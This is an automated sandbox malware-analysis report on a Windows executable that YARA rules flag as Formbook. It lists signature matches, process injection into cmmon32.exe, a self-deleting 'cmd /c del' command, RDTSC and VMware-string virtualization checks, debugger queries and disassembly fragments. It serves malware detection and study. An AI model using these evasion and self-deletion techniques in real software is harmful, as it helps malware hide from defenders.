          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@12/6
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587D72 FindResourceA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_01
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile created: C:\Users\user\AppData\Local\Temp\nsyA3E2.tmpJump to behavior
          Source: UGGJ4NnzFz.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: UGGJ4NnzFz.exeVirustotal: Detection: 29%
          Source: UGGJ4NnzFz.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile read: C:\Users\user\Desktop\UGGJ4NnzFz.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cmmon32.pdb source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: UGGJ4NnzFz.exe, 00000000.00000003.212550994.0000000009A50000.00000004.00000001.sdmp, UGGJ4NnzFz.exe, 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, cmmon32.exe, 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: UGGJ4NnzFz.exe, cmmon32.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeUnpacked PE file: 1.2.UGGJ4NnzFz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_73752F60 push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00416026 push ebx; iretd
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041C087 push dword ptr [DF0C81F8h]; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00409A94 push 00D6BDC6h; iretd
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003B6026 push ebx; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BC087 push dword ptr [DF0C81F8h]; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003A9A94 push 00D6BDC6h; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB40B push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB402 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_003BB46C push eax; ret
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile created: C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000003A85E4 second address: 00000000003A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000003A897E second address: 00000000003A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeAPI coverage: 8.1 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 8.6 %
          Source: C:\Windows\explorer.exe TID: 6164Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6984Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\Desktop\UGGJ4NnzFz.exe
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyA3E3.tmp
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\dceotuvjnitpz
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\6jlp0t221b5inmotwb6
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.222167961.0000000001398000.00000004.00000020.sdmpBinary or memory string: War&Prod_VMware_SATAR
          Source: explorer.exe, 00000005.00000000.247174427.000000000F6E3000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.240796692.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.252370895.0000000001398000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.232477567.0000000004E61000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAv
          Source: explorer.exe, 00000005.00000000.261705438.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.242412172.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000000.261725875.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.239093563.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A61074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A52073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
